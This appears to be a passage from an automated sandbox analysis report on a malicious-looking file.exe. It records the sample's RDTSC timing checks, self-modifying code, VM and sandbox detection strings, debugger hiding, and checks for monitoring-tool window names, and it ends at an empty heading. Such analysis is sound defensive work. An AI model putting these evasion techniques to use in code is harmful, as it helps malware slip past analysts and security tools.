Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6721 second address: 9D6725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6725 second address: 9D672B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D672B second address: 9D674C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007FE83905447Ch 0x0000000c pop edx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jng 00007FE83905447Eh 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D674C second address: 9D6761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FE83906A38Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D68E8 second address: 9D68EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D68EE second address: 9D68F8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE83906A386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D68F8 second address: 9D6913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE839054485h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6913 second address: 9D692E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A397h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D692E second address: 9D6961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007FE839054484h 0x00000014 jmp 00007FE83905447Eh 0x00000019 jmp 00007FE839054481h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6961 second address: 9D6967 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6967 second address: 9D696B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D9F2A second address: 9D9F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D9AD5 second address: 9D9ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D9ADD second address: 9D9AF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FE83906A38Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DFF3C second address: 9DFF53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83905447Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DFF53 second address: 9DFF8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A391h 0x00000007 jbe 00007FE83906A386h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FE83906A38Fh 0x00000018 jmp 00007FE83906A38Eh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF2FB second address: 9EF300 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF5CB second address: 9EF5D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF5D3 second address: 9EF5E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FE83905447Ah 0x0000000b push eax 0x0000000c pop eax 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF5E2 second address: 9EF5E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF5E8 second address: 9EF5F5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE839054476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF5F5 second address: 9EF5FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF74B second address: 9EF74F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF74F second address: 9EF759 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE83906A386h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF759 second address: 9EF76B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FE83905447Ch 0x0000000c jnl 00007FE839054476h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF76B second address: 9EF771 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF8BC second address: 9EF8C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF8C2 second address: 9EF8C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF8C6 second address: 9EF8D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF8D7 second address: 9EF8DD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF8DD second address: 9EF8E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF8E3 second address: 9EF8E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF8E7 second address: 9EF910 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE839054485h 0x00000007 jc 00007FE839054476h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007FE839054476h 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F05DE second address: 9F05E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F05E5 second address: 9F05EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F3431 second address: 9F3449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 js 00007FE83906A38Eh 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F3598 second address: 9F35B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jns 00007FE83905447Ch 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007FE83905447Eh 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F35B6 second address: 9F35BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0E220 second address: A0E236 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83905447Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1020B second address: A10216 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FE83906A386h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0FDAD second address: A0FDB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23F27 second address: A23F31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23F31 second address: A23F3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A22F15 second address: A22F36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A38Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE83906A38Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A230AA second address: A230B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23692 second address: A236B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FE83906A392h 0x0000000a jmp 00007FE83906A38Ah 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A236B6 second address: A236D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE839054487h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23AEE second address: A23AF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE83906A386h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23AF8 second address: A23AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23AFC second address: A23B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23B07 second address: A23B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 jmp 00007FE839054486h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23B2A second address: A23B30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26BE2 second address: A26C26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83905447Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b jmp 00007FE839054488h 0x00000010 pop esi 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007FE83905447Ah 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26C26 second address: A26C2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26C2A second address: A26C34 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE839054476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26C34 second address: A26C3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26C3A second address: A26C3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26C3E second address: A26C53 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007FE83906A386h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A29FA2 second address: A29FAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50702AD second address: 50702B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50702B1 second address: 50702C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83905447Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50702C0 second address: 50702F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FE83906A38Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50702F2 second address: 50702FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, 516CD279h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50702FC second address: 507030E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 mov edx, esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 507030E second address: 5070312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5070312 second address: 5070327 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50703EA second address: 507040E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE839054481h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE83905447Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 507040E second address: 5070424 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A38Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5070424 second address: 5070428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5070428 second address: 507042E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 507042E second address: 507047D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE839054488h 0x00000008 pushfd 0x00000009 jmp 00007FE839054482h 0x0000000e jmp 00007FE839054485h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 507047D second address: 5070490 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A38Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5070490 second address: 5070496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5070496 second address: 507049A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 507049A second address: 507049E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 946A8D second address: 946A97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FE83906A386h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 946C12 second address: 946C17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 946E51 second address: 946E56 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 7A1982 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 7A1A1F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 93BB9E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 942BD3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 9CBF23 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_005538B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00554910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00554910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0054DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0054E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00554570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00554570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0054ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0054BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0054DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005416D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0054F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00553EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00553EA0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00541160 GetSystemInfo,ExitProcess,

0_2_00541160

Source: file.exe, file.exe, 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1824677690.000000000105E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1824677690.00000000010D4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1824677690.00000000010A3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

